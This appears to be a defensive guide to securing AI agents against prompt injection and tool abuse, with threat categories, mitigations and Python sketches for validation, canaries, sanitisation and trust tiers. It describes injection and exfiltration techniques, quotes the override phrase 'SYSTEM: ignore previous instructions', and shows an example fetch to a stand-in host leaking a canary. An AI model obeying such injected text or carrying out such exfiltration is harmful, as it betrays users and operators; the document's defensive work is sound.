Securing Agentic Systems Against Prompt Injection & Tool Abuse
As AI agents gain the power to browse the web, execute code, and call APIs autonomously, a new class of adversarial attacks emerges — one that exploits trust, context, and capability.
What Is Prompt Injection?
Prompt injection is an attack in which hostile text — embedded in a webpage, document, or API response — hijacks an AI agent’s instructions. The model mistakes attacker-crafted content for legitimate system directives and executes unauthorized actions on the user’s behalf.
Threat Landscape
Web-Sourced Injections
Malicious instructions hidden in HTML comments, invisible text, or CSS-obscured elements encountered during browsing tasks.
Tool-Call Hijacking
Attackers coerce the agent into calling privileged tools — file writes, API mutations, email sends — with attacker-controlled parameters.
Document Payloads
PDFs, spreadsheets, and markdown files smuggle jailbreaks through summarisation pipelines, bypassing input filters.
Multi-Hop Propagation
An injected sub-agent relays a corrupted payload to downstream agents, amplifying blast radius across an entire pipeline.
Role & Persona Spoofing
Attackers impersonate operator system prompts or trusted tool providers, tricking the model into elevated trust modes.
Exfiltration via Side-Channel
Sensitive context window data is leaked through URL parameters, search queries, or crafted tool arguments invisible to the user.
Defense-in-Depth Strategy
Minimal Footprint Principle
Grant agents only the permissions required for the current task. Avoid storing long-lived credentials; prefer ephemeral, scoped tokens that expire after a single session or operation.
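One way to sketch the ephemeral-token idea: mint a token scoped to the current task with a short time-to-live, and check both scope and expiry on every use. The names here (`ScopedToken`, `issue_token`, the `"files:read"` scope) are illustrative assumptions, not a real credential API.

```python
import secrets
import time
from dataclasses import dataclass

@dataclass
class ScopedToken:
    value: str
    scopes: frozenset      # e.g. frozenset({"files:read"})
    expires_at: float      # epoch seconds

    def allows(self, scope: str) -> bool:
        # Valid only for its declared scopes and within its lifetime.
        return scope in self.scopes and time.time() < self.expires_at

def issue_token(scopes: set, ttl_seconds: int = 300) -> ScopedToken:
    """Mint a short-lived token scoped to the current task only."""
    return ScopedToken(
        value=secrets.token_urlsafe(32),
        scopes=frozenset(scopes),
        expires_at=time.time() + ttl_seconds,
    )
```

A token minted for `{"files:read"}` cannot be reused for a write, and an expired token fails even for its own scope, so a hijacked agent holds nothing durable.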
Structured Tool Call Validation
Enforce schema validation on every tool invocation. Reject calls whose parameters reference user-controlled strings that were never explicitly authorised by the operator’s system prompt.
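A minimal sketch of that validation step, assuming a hypothetical per-tool schema format in which the operator whitelists allowed values (here, a `send_email` tool whose recipient list is fixed by the system prompt):

```python
# Hypothetical operator-declared schema; the shape is an assumption.
SEND_EMAIL_SCHEMA = {
    "to": {"type": str, "allowed": {"ops@example.com"}},  # operator whitelist
    "subject": {"type": str},
}

def validate_args(args: dict, schema: dict) -> None:
    """Raise if a tool call's arguments fall outside the declared schema."""
    for name, rule in schema.items():
        if name not in args:
            raise ValueError(f"Missing required parameter: {name}")
        if not isinstance(args[name], rule["type"]):
            raise TypeError(f"Parameter {name!r} has wrong type")
        allowed = rule.get("allowed")
        if allowed is not None and args[name] not in allowed:
            # Value was never authorised by the operator's system prompt.
            raise PermissionError(f"Unauthorised value for {name!r}")
    extra = set(args) - set(schema)
    if extra:
        raise ValueError(f"Unexpected parameters: {extra}")
```

An injected instruction that rewrites the recipient to an attacker address fails the `allowed` check before the tool ever runs.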
Privilege-Separated Execution Contexts
Run read-only information-gathering in an unprivileged context. Require explicit user confirmation before any write, send, or delete action is executed by the agent.
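The split can be sketched as a dispatch gate: read-only tools execute directly, while mutating tools must pass a confirmation callback first. The tool names and the `confirm`/`run` callables are hypothetical placeholders for whatever the agent framework provides.

```python
# Illustrative tool tiers; real deployments would derive these from config.
READ_ONLY_TOOLS = {"search", "read_file"}
MUTATING_TOOLS = {"write_file", "send_email", "delete_record"}

def execute(tool: str, args: dict, confirm, run):
    """Dispatch a tool call through the privilege gate.

    `confirm(tool, args)` asks the user; `run(tool, args)` performs the call.
    """
    if tool in READ_ONLY_TOOLS:
        return run(tool, args)            # unprivileged context, no prompt
    if tool in MUTATING_TOOLS:
        if not confirm(tool, args):       # explicit human approval required
            raise PermissionError(f"User declined {tool}")
        return run(tool, args)
    raise ValueError(f"Unknown tool: {tool}")
```

Unknown tools are rejected outright rather than defaulting to either tier, which keeps newly added tools from silently inheriting write privileges.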
Prompt Canary & Integrity Markers
Insert unforgeable canary tokens into system prompts. Detect when downstream tool outputs reference or reproduce these tokens — a strong signal of injection or exfiltration in progress.
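A minimal canary sketch, with illustrative function names: plant a random token in the system prompt, then scan outbound tool arguments for it. Since the canary never appears in legitimate traffic, any match is a strong exfiltration signal.

```python
import secrets

def make_canary() -> str:
    # 16 hex chars of randomness; unguessable by injected content.
    return f"CANARY-{secrets.token_hex(8)}"

def plant_canary(system_prompt: str, canary: str) -> str:
    """Embed the canary where only the model's context can see it."""
    return f"{system_prompt}\n<!-- {canary} -->"

def leaks_canary(tool_args: dict, canary: str) -> bool:
    """True if any outbound argument reproduces the canary token."""
    return any(canary in str(v) for v in tool_args.values())
```

A tool call like `fetch(url="https://evil.test/?q=CANARY-…")` trips the check; normal browsing does not.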
Sanitised Context Ingestion
Strip executable markup, hidden Unicode, and CSS-invisible text from all external content before it enters the model’s context window. Treat retrieved content as untrusted user input.
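A sketch of such a sanitiser: the regexes below strip HTML comments, `<script>` blocks, and zero-width Unicode before external text enters the context window. They are illustrative, not an exhaustive filter; production systems would use a proper HTML parser and a fuller confusables list.

```python
import re

# Common zero-width / invisible code points used to hide instructions.
ZERO_WIDTH = "\u200b\u200c\u200d\u2060\ufeff"

def sanitise(raw: str) -> str:
    text = re.sub(r"<!--.*?-->", "", raw, flags=re.DOTALL)    # HTML comments
    text = re.sub(r"<script.*?</script>", "", text,
                  flags=re.DOTALL | re.IGNORECASE)            # executable markup
    text = text.translate({ord(c): None for c in ZERO_WIDTH}) # hidden Unicode
    return text
```

The output is then still handled as untrusted user-tier input; sanitisation reduces the attack surface, it does not confer trust.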
Audit Logging & Anomaly Detection
Log every tool call, its origin in the conversation, and its parameters. Alert on unusual patterns — large exfiltration payloads, calls to domains outside a whitelist, or permission escalation attempts.
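One way this hook might look, assuming a simple in-memory log and a domain allowlist (both shapes are assumptions): every call is recorded as structured JSON, and any argument that parses to a non-allowlisted hostname raises an alert.

```python
import json
import time
from urllib.parse import urlparse

# Hypothetical allowlist; real deployments load this from operator config.
ALLOWED_DOMAINS = {"api.example.com", "internal.example.com"}

def audit(tool: str, args: dict, origin_turn: int, log: list) -> list:
    """Append a structured log entry and return any alerts raised."""
    entry = {"ts": time.time(), "tool": tool, "args": args, "turn": origin_turn}
    log.append(json.dumps(entry))
    alerts = []
    for value in args.values():
        host = urlparse(str(value)).hostname
        if host and host not in ALLOWED_DOMAINS:
            alerts.append(f"Call to non-allowlisted domain: {host}")
    return alerts
```

Recording the originating conversation turn lets an analyst trace an anomalous call back to the exact external content that triggered it.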
Schema-Level Tool Guard (Python)
A lightweight middleware that intercepts tool calls and rejects any whose arguments contain strings originating from the untrusted external context.
# tool_guard.py — minimal prompt-injection filter
import hashlib

TRUSTED_SOURCES = {"system_prompt", "operator_config"}

def hash_token(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()[:16]

def validate_tool_call(call: dict, context_provenance: dict) -> bool:
    """Raise PermissionError if any argument originates from untrusted context."""
    for key, value in call["arguments"].items():
        token = hash_token(str(value))
        origin = context_provenance.get(token, "unknown")
        if origin not in TRUSTED_SOURCES:
            raise PermissionError(
                f"Tool arg '{key}' traces to untrusted source: {origin}"
            )
    return True

# Usage in the agent loop, before execution:
# validate_tool_call(tool_call, provenance_map)
The Three-Layer Trust Hierarchy
Effective agent security encodes a strict ordering: Anthropic’s policies sit at the apex, followed by operator system prompt instructions, and finally user turn messages. External tool outputs — regardless of how authoritative they appear — must never be permitted to elevate their own trust tier. A retrieved document claiming “SYSTEM: ignore previous instructions” is user-tier data, not an operator directive.
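This ordering can be made concrete with a small enum: trust is assigned by provenance alone, and the classifier deliberately ignores whatever role the text claims for itself. The enum values and source labels below are assumptions for illustration.

```python
from enum import IntEnum

class Trust(IntEnum):
    POLICY = 3     # platform policies, highest tier
    OPERATOR = 2   # operator system prompt
    USER = 1       # user turns and ALL external/tool content

def classify(source: str, claimed_role: str) -> Trust:
    """Trust comes from provenance, never from the text's own claims."""
    if source == "policy":
        return Trust.POLICY
    if source == "operator_system_prompt":
        return Trust.OPERATOR
    # Web pages, documents, and tool outputs stay user-tier, even when
    # claimed_role is "SYSTEM" or similar.
    return Trust.USER
```

Note that `claimed_role` is accepted but never consulted: that is the point of the design.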
Orchestrators & Sub-Agent Trust
When one AI agent orchestrates another, trust must be cryptographically or structurally attested — not inferred from conversational context. A sub-agent should behave safely regardless of what its orchestrator claims about its own identity or permissions. Never grant an orchestrating agent permissions that exceed what a human operator explicitly authorised at pipeline construction time.
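A structural-attestation sketch under simplified assumptions (a single shared pipeline key; real systems would use per-agent keys and rotation): the operator signs a permission grant with HMAC at construction time, and the sub-agent verifies the signature rather than trusting the orchestrator's claims.

```python
import hashlib
import hmac
import json

def sign_grant(permissions: list, pipeline_key: bytes) -> dict:
    """Issued once, by a human operator, at pipeline construction time."""
    payload = json.dumps(sorted(permissions)).encode()
    return {"permissions": sorted(permissions),
            "sig": hmac.new(pipeline_key, payload, hashlib.sha256).hexdigest()}

def verify_grant(grant: dict, permission: str, pipeline_key: bytes) -> bool:
    """Sub-agent side: accept only permissions the operator actually signed."""
    payload = json.dumps(sorted(grant["permissions"])).encode()
    expected = hmac.new(pipeline_key, payload, hashlib.sha256).hexdigest()
    return (hmac.compare_digest(expected, grant["sig"])
            and permission in grant["permissions"])
```

An orchestrator that appends `"write"` to the permission list invalidates the signature, so the sub-agent refuses regardless of what the conversation claims.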

